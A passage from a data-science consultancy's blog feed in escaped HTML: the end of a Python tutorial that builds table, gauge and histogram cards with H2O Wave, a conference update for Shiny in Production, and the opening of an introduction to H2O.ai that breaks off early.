&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;### Making table&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;def&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;make_table&lt;/span&gt;(df):
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;return&lt;/span&gt; ui&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;table(name&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#39;table&amp;#39;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; height &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;250px&amp;#39;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; columns &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; [ui&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;table_column(name&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;x, label&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;x) &lt;span style="color:#ff7b72"&gt;for&lt;/span&gt; x &lt;span style="color:#ff7b72;font-weight:bold"&gt;in&lt;/span&gt; df&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;columns&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;tolist()],
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; rows &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; [ui&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;table_row(name &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; str(i), cells &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; list(map(str, df&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;values&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;tolist()[i]))) &lt;span style="color:#ff7b72"&gt;for&lt;/span&gt; i &lt;span style="color:#ff7b72;font-weight:bold"&gt;in&lt;/span&gt; df&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;index[&lt;span style="color:#a5d6ff"&gt;0&lt;/span&gt;:&lt;span style="color:#a5d6ff"&gt;100&lt;/span&gt;]]
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;def&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;show_table&lt;/span&gt;(q:Q, df):
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; q&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;page[&lt;span style="color:#a5d6ff"&gt;&amp;#39;section1&amp;#39;&lt;/span&gt;] &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; ui&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;section_card(box&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#39;section1&amp;#39;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; title&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#39;Table of the Data&amp;#39;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; subtitle&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#39;&amp;#39;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; q&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;page[&lt;span style="color:#a5d6ff"&gt;&amp;#39;table&amp;#39;&lt;/span&gt;] &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; ui&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;form_card(box&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;ui&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;box(&lt;span style="color:#a5d6ff"&gt;&amp;#39;top&amp;#39;&lt;/span&gt;, width &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;49.5%&amp;#39;&lt;/span&gt;),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; items &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; [make_table(df)],
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## Making stats cards&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;def&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;make_stats_card_data&lt;/span&gt;(q:Q, column):
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; value_counts &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; column&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;value_counts()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; total &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; value_counts&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;sum()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;return&lt;/span&gt; value_counts[&lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;], total
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;def&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;show_stats_card&lt;/span&gt;(q:Q, column, index):
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; value_count, total &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; make_stats_card_data(q, column)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; percentage &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; value_count&lt;span style="color:#ff7b72;font-weight:bold"&gt;/&lt;/span&gt;total
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; q&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;page[&lt;span style="color:#a5d6ff"&gt;&amp;#39;stat&amp;#39;&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;str(index)] &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; ui&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;tall_gauge_stat_card(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; box &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; ui&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;box(&lt;span style="color:#a5d6ff"&gt;&amp;#39;top&amp;#39;&lt;/span&gt;, width &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;11.75%&amp;#39;&lt;/span&gt;),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; title &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;Number of houses with &amp;#39;&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt; column&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;name,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; value &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;={{intl one}}&amp;#39;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; aux_value&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#39;={{intl perc style=&amp;#34;percent&amp;#34; minimum_fraction_digits=2 maximum_fraction_digits=2 }}&amp;#39;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; progress &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; percentage,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; data &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; dict(one&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;int(value_count),perc&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;float(percentage)),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; plot_color &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;$blue&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;def&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;show_multiple_stats_cards&lt;/span&gt;(q:Q, df, index):
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;for&lt;/span&gt; i &lt;span style="color:#ff7b72;font-weight:bold"&gt;in&lt;/span&gt; index:
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; column_name &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; df&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;columns&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;tolist()[i]
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; column &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; df[column_name]
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; show_stats_card(q, column, i)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;### Making histograms&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;def&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;make_histogram_data&lt;/span&gt;(values):
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; count, division &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; np&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;histogram(values)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;return&lt;/span&gt; [(x, y) &lt;span style="color:#ff7b72"&gt;for&lt;/span&gt; x, y &lt;span style="color:#ff7b72;font-weight:bold"&gt;in&lt;/span&gt; zip(division&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;tolist(), count&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;tolist())]
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;def&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;show_histogram&lt;/span&gt;(q:Q, values, variable_name, index):
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; q&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;page[&lt;span style="color:#a5d6ff"&gt;&amp;#39;feat&amp;#39;&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;str(index)] &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; ui&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;plot_card(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; box &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; ui&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;box(&lt;span style="color:#a5d6ff"&gt;&amp;#39;bottom&amp;#39;&lt;/span&gt;, width &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;25%&amp;#39;&lt;/span&gt;),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; title &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;Histogram of &amp;#39;&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt; variable_name,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; data&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;data(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; fields&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;[&lt;span style="color:#a5d6ff"&gt;&amp;#39;division&amp;#39;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#39;counts&amp;#39;&lt;/span&gt;],
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; rows&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;make_histogram_data(values),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; pack&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#79c0ff"&gt;True&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; plot&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;ui&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;plot([ui&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;mark(type&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#39;interval&amp;#39;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; x&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#39;=division&amp;#39;&lt;/span&gt;, y&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#39;=counts&amp;#39;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; y_min&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;0&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; x_title&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;variable_name, y_title&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#39;Count&amp;#39;&lt;/span&gt;)]
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;def&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;show_histograms&lt;/span&gt;(q:Q, df, index):
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; q&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;page[&lt;span style="color:#a5d6ff"&gt;&amp;#39;section2&amp;#39;&lt;/span&gt;] &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; ui&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;section_card(box&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#39;section2&amp;#39;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; title&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#39;Plot of the data&amp;#39;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; subtitle&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#39;&amp;#39;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;for&lt;/span&gt; i &lt;span style="color:#ff7b72;font-weight:bold"&gt;in&lt;/span&gt; index:
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; column_name &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; df&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;columns&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;tolist()[i]
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; values &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; df[column_name]
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; show_histogram(q, values, column_name, i)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h2 id="next-steps"&gt;Next steps&lt;/h2&gt;
&lt;p&gt;Now that we&amp;rsquo;ve made our app why not go ahead and try to add other widgets to it or maybe change the layout or colour scheme? Take a look at the Wave documentation to see what else you could add! There are examples on how to use most &lt;a href="https://wave.h2o.ai/docs/widgets/overview" rel="external"&gt;widgets&lt;/a&gt; and &lt;a href="https://wave.h2o.ai/docs/guide" rel="external"&gt;step-by-step guides&lt;/a&gt; talking through various topics such as page layouts, uploading files and writing tests.&lt;/p&gt;
&lt;p&gt;H2O Wave also have a &lt;a href="https://github.com/h2oai/wave-apps" rel="external"&gt;GitHub&lt;/a&gt; repository with applications that they have made which you could try using and editing for your own use. If that isn&amp;rsquo;t enough links for you to look at, the Wave website also has a &lt;a href="https://wave.h2o.ai/blog" rel="external"&gt;blog section&lt;/a&gt; where they announce any updates and share other useful information.&lt;/p&gt;
&lt;p&gt;Finally, I always find it helpful to look through a few different examples of how to code something when I&amp;rsquo;m learning a new skill so why not take a look at &lt;a href="https://www.youtube.com/watch?v=alYWqXv8Sdg" rel="external"&gt;this video tutorial&lt;/a&gt; made by H2O. The tutorial will show you how to create a simple app for displaying data a bit like what we have just gone through (but they make the app more interactive). Note that the tutorial was created in 2021 so it uses an older version of H2O Wave. It still works with the latest version of H2O Wave (which at the time of writing is 0.20), the only difference is how to run the app. In previous versions (below 0.20) we needed to start a wave server manually, but now we can simply run your wave app by &lt;code&gt;wave run &amp;lt;code_script&amp;gt;&lt;/code&gt; and the wave server is started automatically.&lt;/p&gt;
&lt;p&gt;Jumping Rivers are now an H2O.ai partner, so if you want any further information please feel free to &lt;a href="https://www.jumpingrivers.com/contact/" rel="external"&gt;contact us&lt;/a&gt;. You can also check out our courses on &lt;a href="https://www.jumpingrivers.com/training/all-courses/" rel="external"&gt;H2O Wave and H2O Driverless AI&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;I hope you found this tutorial helpful. Have fun making your next H2O Wave app!&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/displaying-data-with-h2o-wave/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Shiny in Production Update</title><link>https://www.jumpingrivers.com/blog/shiny-in-production-update/</link><pubDate>Tue, 14 Jun 2022 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/shiny-in-production-update/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/shiny-in-production-update/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/shiny-in-production-update/original.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;h3 id="registration-is-now-open"&gt;&lt;a href="https://shiny-in-production.jumpingrivers.com/" rel="external"&gt;Registration is now open!&lt;/a&gt;&lt;/h3&gt;
&lt;p&gt;Organisation is now well under way for &lt;a href="https://shiny-in-production.jumpingrivers.com/" rel="external"&gt;Shiny in Production&lt;/a&gt; on 6th-7th October! Our events team here at Jumping Rivers have been hard at work to make sure the conference is everything it promises to be.&lt;/p&gt;
&lt;p&gt;There have been a few updates over the last month or so, so we thought it was about time for another blog post to keep you all informed!&lt;/p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Do you require help building a Shiny app? Would you like someone to take over the maintenance burden?
If so, check out
our
&lt;a href="https://www.jumpingrivers.com/consultancy/shiny-dash-flask-dashboard-consultancy/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2022-shiny-in-production-update"&gt;Shiny and Dash&lt;/a&gt;
services.
&lt;/p&gt;
&lt;/aside&gt;
&lt;img src="robot_shiny.png" title="Shiny Robot" alt="Jumping Rivers robot holding a spanner" style="display: block; width: 200px; margin-right: auto; margin-left: auto;" /&gt;
&lt;h4 id="speakers"&gt;Speakers&lt;/h4&gt;
&lt;p&gt;We now have a list of speakers up on the website. We&amp;rsquo;re excited to welcome these industry experts to Newcastle, and hear their take on all things Shiny in Production.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://twitter.com/ChrisBeeley" rel="external"&gt;Chris Beeley&lt;/a&gt; - NHS&lt;/li&gt;
&lt;li&gt;&lt;a href="https://twitter.com/c__constantine" rel="external"&gt;Caterina Constantinescu&lt;/a&gt; - Vuzo&lt;/li&gt;
&lt;li&gt;&lt;a href="https://twitter.com/nic_crane" rel="external"&gt;Nic Crane&lt;/a&gt; - Voltron Data&lt;/li&gt;
&lt;li&gt;&lt;a href="https://twitter.com/_colinfay" rel="external"&gt;Colin Fay&lt;/a&gt; - ThinkR&lt;/li&gt;
&lt;li&gt;&lt;a href="https://twitter.com/a_c_patt" rel="external"&gt;Andrew Patterson&lt;/a&gt; - Jumping Rivers&lt;/li&gt;
&lt;li&gt;&lt;a href="https://twitter.com/sellorm" rel="external"&gt;Mark Sellors&lt;/a&gt; - RStudio/Data Orchard&lt;/li&gt;
&lt;li&gt;&lt;a href="https://twitter.com/MikeKSmith" rel="external"&gt;Mike Smith&lt;/a&gt; - Pfizer&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Plus more to be announced!&lt;/p&gt;
&lt;h4 id="workshops"&gt;Workshops&lt;/h4&gt;
&lt;p&gt;The workshops for the afternoon of the first day are now confirmed. Our Jumping Rivers trainers are super excited to present three afternoon-long workshops on RStudio Connect, Tableau and Dashboards in R Markdown! When registering, make sure to select the tickets for workshop your interested in!&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Introduction to RStudio Connect&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;RStudio Connect is a hosting platform which makes publishing your shiny applications; plumber APIs; R Markdown documents, and many other content types, painless and easy. In this workshop we will demonstrate a few different workflows which allow you to host, share, and scale content on RStudio Connect.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Introduction to Tableau&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Faster and more capable of handling larger datasets than Excel, Tableau is quickly becoming a valuable tool for individuals and organisations who want to leverage their data. It’s more user-friendly and simpler to learn than programming languages, but still allows a high-level of customisation. This workshop is designed for people with no prior experience of Tableau, who want to get to grips with the basics of summarising and interactively visualising their data.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Dashboards with R Markdown&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;R Markdown is an easy to use tool that allows you to dynamically create static or interactive documents and automatically update reports when data changes. Whether you are hoping to generate HTML, PDF or Microsoft Word like documents, or even slides for a presentation, R Markdown tailors to your needs. This workshop will demonstrate how to make simple flexdashboards in R Markdown.&lt;/p&gt;
&lt;h4 id="registration"&gt;Registration&lt;/h4&gt;
&lt;p&gt;Registration is now open! Early bird tickets are available until July 31st! To make the most of this 20% discount, head over to our &lt;a href="https://shiny-in-production.jumpingrivers.com/" rel="external"&gt;conference website&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;We can&amp;rsquo;t wait to welcome you to Newcastle on 6th-7th October 2022!&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/shiny-in-production-update/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>An introduction to H2O.ai</title><link>https://www.jumpingrivers.com/blog/introduction-to-h2o/</link><pubDate>Thu, 09 Jun 2022 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/introduction-to-h2o/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/introduction-to-h2o/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/introduction-to-h2o/h2oaiLogo.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;If you came here looking for an introduction to water, or a synopsis of the 2003 TV series about teenage mermaids you have sadly come to the wrong place. The H2O that we will talk about is H2O.ai, a company which develops products for easy, scalable, machine learning and artificial intelligence.&lt;/p&gt;
&lt;h2 id="introduction"&gt;Introduction&lt;/h2&gt;
&lt;p&gt;Machine learning and artificial intelligence (or AI for short) are topics which have had a lot of interest over the past 4-5 years. Some of this interest has come from businesses as they begin to utilise the information they collect on a day-to-day basis to streamline/automate processes or gain insight. A lot of companies are now looking to hire data scientists/engineers and in turn this is making a lot more people interested in machine learning and AI.&lt;/p&gt;
&lt;p&gt;&lt;img alt="Logos of various different machine learning and AI tools" height="auto" id="h-rh-i-0" src="https://www.jumpingrivers.com/blog/introduction-to-h2o/logos.png" width="466"&gt;&lt;/p&gt;
&lt;p&gt;Now, as you look at upskilling in machine learning and AI, you might start by reading some books, taking some online courses and, if you are anything like me, going through many, many, many online tutorials and blog posts on different techniques. It’s at this point you will probably start to realise there are a lot of tools out there that you can use for your machine learning or AI problems. Deciding which tool is best for the job at hand can be very difficult. Hopefully, after reading this blog you will have a better idea of H2O.ai’s products and if they are what you have been looking for.&lt;/p&gt;
&lt;h2 id="who-are-h2oai"&gt;Who are H2O.ai?&lt;/h2&gt;
